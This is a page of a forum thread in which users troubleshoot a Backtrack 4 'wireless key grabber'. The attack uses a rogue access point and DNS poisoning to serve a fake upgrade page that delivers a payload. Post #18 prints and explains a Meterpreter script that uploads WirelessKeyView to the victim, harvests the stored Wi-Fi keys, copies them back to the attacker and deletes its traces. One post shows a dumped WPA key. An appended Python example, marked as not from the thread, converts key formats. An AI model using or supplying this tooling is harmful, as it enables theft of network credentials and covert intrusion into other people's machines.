Page 2 of 5
Results 11 to 20 of 44

Thread: Wireless key grabber - Backtrack 4

  1. #11
    williamc (Good friend of the forums)
    Join Date: Feb 2010
    Location: Chico CA
    Posts: 285

    I went back and tried your tutorial with an XP victim PC and it worked. I configured lighttpd on BT3 and everything appeared to be functional. However, once the victim runs the payload, isn't his connection supposed to forward through eth0? Victim is only receiving your upgrade page. Also, the payload isn't removed, it remains in the temporary internet files.

    Code:
    Received data from: 10.0.0.254:60181 with length: 32 asking for: www.google.com
    POISONED...
    Received data from: 10.0.0.254:62623 with length: 29 asking for: www.cnn.com
    POISONED...
    Received data from: 10.0.0.254:56017 with length: 39 asking for: download718.avast.com
    POISONED...
    I'll write up a walkthrough for BT3 once these remaining issues are addressed. Any idea on the Vista?

    William

  2. #12
    cr1spyj0nes (Member)
    Join Date: Sep 2008
    Posts: 164

    Sorry, but no.
    Nice tutorial; it's been a while since any good tuts went up.
    Anyway, so I pwned myself and obtained:
    Code:
    ==================================================
    Network Name (SSID): BigPond1967
    Key Type : WPA-PSK
    Key (Hex) : 3138383234393634323200
    Key (Ascii) :
    Adapter Name : D-Link AirPlus G DWL-G122 Wireless USB Adapter(rev.C)
    Adapter Guid : {********-****-****-****-*************}
    ==================================================
    Now that's not my key, or it is my key but in hex. How do I crack the hex output or even calculate it to my key???
    I would rather be hated for what I am,
    Than loved for what I am not.

  3. #13
    williamc (Good friend of the forums)
    Join Date: Feb 2010
    Location: Chico CA
    Posts: 285

    Use a HEX to ASCII converter?
    http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html

    William

  4. #14
    Member
    Join Date: Feb 2010
    Posts: 204

    Quote Originally Posted by williamc
    Use a HEX to ASCII converter:
    http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html

    William

    I don't think that will work; it doesn't generate a passphrase. You can use Cain/Abel in Windows and convert the hex to a passphrase, but is it really needed, and it does take a while. Can you not enter the hex directly?

    You should be able to enter the hex key directly in Ubuntu/BT4; I think I posted it in another thread. Just google "entering 64 character wpa key linux" or something similar.

  5. #15
    Member
    Join Date: Feb 2010
    Posts: 204

    This thread is just a wireless key grabber, and nothing else; no internet access is available.

    If you want it to do this then the steps would be:

    create AP
    iptables with forwarding traffic via eth0

    victim connects, surfs the internet, then use the DNS tool to redirect the user to the fake webpage, and then switch off the DNS poisoning tool.

  6. #16
    williamc (Good friend of the forums)
    Join Date: Feb 2010
    Location: Chico CA
    Posts: 285

    Thanks for the reply hm2075. I realize that I've been looking at two different scripts.

    However, there are still some problems that I'm having issues with. First off, this does not seem to work on Vista clients. I spent days trying to get it working, and finally ran it on XP and it worked no problem. Anyone have luck with Vista?

    Second, I understand that you can enter the hex key into Ubuntu, but that is problematic in XP. I've tried your suggestion of using Cain, but the key does not appear to be long enough and crashes Cain. Ideas?

  7. #17
    Member
    Join Date: Feb 2010
    Posts: 204

    When you type a WPA-PSK key in Windows XP, the characters that you type are automatically converted into a new binary key that contains 32 bytes (64 hexadecimal digits). This binary key cannot instantly be converted back to the original key that you typed, but you can still use it for connecting to the wireless network exactly like the original key. In this case, WirelessKeyView displays this binary key in the Hex key column, but it doesn't display the original key that you typed.
    As opposed to Windows XP, Windows Vista doesn't convert the WPA-PSK key that you type into a new binary key, but simply keeps the original key that you type. So under Windows Vista, the original WPA-PSK key that you typed is displayed in the Ascii key column.

    So two things here: Vista shows the passphrase whereas XP shows the hex key. We learn two things here: WirelessKeyView works on XP and Vista, and we know the key formats too.

    Taken from GRC:
    Each of the 64 hexadecimal characters encodes 4 bits of binary data, so the entire 64 characters is equivalent to 256 binary bits — which is the actual binary key length used by the WiFi WPA pre-shared key (PSK). Some WPA-PSK user interfaces (such as the one in Windows XP) allow the 256-bit WPA pre-shared key to be directly provided as 64 hexadecimal characters. This is a precise means for supplying the WPA keying material, but it is ONLY useful if ALL of the devices in a WPA-protected WiFi network allow the 256-bit keying material to be specified as raw hex. If any device did not support this mode of specification (and most do not) it would not be able to join the network.
    This bit is interesting; is it saying some routers will not accept the key format in hex?

    To try and convert the key back to a passphrase, open up Cain/Abel:
    click on the Cracker tab, right-click on the right panel and press Add to List, now enter the WPA key in hex, right-click again on the ESSID and change it, finally right-click and choose the crack method.

    Now you will see that if you try to brute-force it, it will take about 1000 years for a key that is 8 chars, so the bottom line is there is no point trying to convert the hex into a passphrase; you might as well just try and crack the handshake in the first place.

    So back to square one: we need a way to directly enter the WPA hex key. That's not a problem in Ubuntu, so I'd say end of discussion.. LOL

    Next post will deal with the Vista problem, I hope.

  8. #18
    Member
    Join Date: Feb 2010
    Posts: 204

    We shall go through harvester.rb so that people understand the coding.

    Code:
    # bin -- the name of our exe, straightforward here; wireless key viewer has been renamed to wkv.exe
    bin = "wkv.exe"

    # output of wireless key viewer -- what we want here is a random text file to be generated when wkv is run, otherwise every victim will have the same txt file and you won't know the difference
    out = Rex::Text.rand_text_alpha_upper(5) + ".txt"

    # destination for the keys in txt format - where we want our keys uploaded on our backtrack machine
    dest = "/root/Desktop/WKV/"

    # upload wireless key viewer --- line 1 is just a comment, line 2 is waiting, line 3 is telling meterpreter to upload our "bin" which is wkv to the system drive on the victim, which is mostly c:, the location of wkv.exe, and then a comment
    print_status("Uploading Wireless Key Viewer")
    sleep(1)
    client.fs.file.upload_file("%SystemDrive%\\#{bin}" , "/root/Desktop/WKV/wkv.exe")
    sleep(1)
    print_status("Uploaded Wireless Key Viewer")
    sleep(1)

    # execute via cmd; output will be a random name. Executes the wkv file with the /stabular parameter with "out" as described above.
    print_status("Executing wireless key viewer ")
    client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stabular /#{out}", nil, {'Hidden' => 'false'})
    print_status("wkv executed")
    sleep(1)

    # download keys to our keys folder; destination as coded above, out is our random text file as coded above
    print_status("Downloading keys to keys folder ")
    client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}")
    print_status("Downloaded keys to keys folder ")

    # delete uploaded files -- we can also clear logs here if we want to
    sleep(1)

    print_status("Deleting uploaded files ")
    client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'})
    client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'})
    print_status("Have a nice day!!!!!! ")

  9. #19
    Member
    Join Date: Feb 2010
    Posts: 204

    So the question is where Vista is breaking down.

    First check if the wkv file is being uploaded into the system drive, e.g. c:

    Then check if the random text file is being generated.

    If both work then it is the uploading that is not working.

    Haven't got a Vista machine so unable to test.

    With the payload being stuck in temp files, we should be able to delete it using scripts, but it is harmless there because execution is only a one-time process.

  10. #20
    williamc (Good friend of the forums)
    Join Date: Feb 2010
    Location: Chico CA
    Posts: 285

    Thanks for the response. The Vista problem is before the file is even uploaded. I'm unable to browse to the payload page. The client has received the DHCP information from the attack box, but gets "page cannot be displayed" when browsing. I cannot ping the attack box IP or gateway; I get "Destination Unreachable".

    As for the wireless key in hex, this is what gets dumped into the WKV folder:
    Code:
    cat FVPVC.txt
    Linksys             WPA-PSK             a78178f5a4050ce82de1              Dell Wireless 1350
    w {15CDB4A8-98B9-4285-
    It's not 64 bytes, and like I said, it crashes Cain when I load it.

    William
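An added example, not code from this thread or from the harvester script: it works through the derivation that post #17 describes (the 64-hex-digit key XP stores is PBKDF2 of passphrase and SSID, which is why it cannot be turned back into the passphrase) and classifies the "Key (Hex)" shapes that appear in posts #12 and #20. Only the Python standard library is used; the "password"/"IEEE" pair is the published IEEE 802.11i test vector, and the "secretpass" hex string is a constructed sample.

```python
import hashlib
import re

# Added example (not from this thread): WPA PSK derivation and a classifier for
# the hex key formats that WirelessKeyView-style dumps produce on XP vs. Vista.


def wpa_psk(passphrase: str, ssid: str) -> str:
    """IEEE 802.11i passphrase-to-PSK mapping:
    PSK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096 iterations, 256 bits).
    This 64-hex-digit value is what XP keeps.  PBKDF2 is one-way, so the
    passphrase cannot be computed back from it, only guessed (post #17)."""
    psk = hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                              ssid.encode("utf-8"), 4096, dklen=32)
    return psk.hex()


def classify_hex_key(hex_key: str) -> tuple[str, str]:
    """Classify a 'Key (Hex)' column value.  Returns (kind, value):
      'psk'        64 hex digits: the raw 256-bit key (XP); value is the hex
      'passphrase' 8..63 printable ASCII bytes, optionally NUL-terminated:
                   the passphrase itself written in hex; value is the text
      'unknown'    anything else, e.g. a value truncated by column width"""
    h = re.sub(r"\s+", "", hex_key).lower()
    if not re.fullmatch(r"[0-9a-f]+", h) or len(h) % 2:
        return ("unknown", h)
    raw = bytes.fromhex(h)
    if len(raw) == 32:
        return ("psk", h)
    text = raw.rstrip(b"\x00")  # dumps often carry a trailing C-string NUL
    if 8 <= len(text) <= 63 and all(0x20 <= b <= 0x7E for b in text):
        return ("passphrase", text.decode("ascii"))
    return ("unknown", h)


if __name__ == "__main__":
    # Constructed sample: the passphrase "secretpass" plus a NUL, as hex.
    print(classify_hex_key("7365637265747061737300"))
    # Published 802.11i test vector: passphrase "password", SSID "IEEE".
    psk = wpa_psk("password", "IEEE")
    print(psk, classify_hex_key(psk)[0])
```

A value that is neither 64 hex digits nor printable ASCII (such as the 20-digit column in post #20) comes back as "unknown", which is the case to investigate before feeding it to any other tool.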
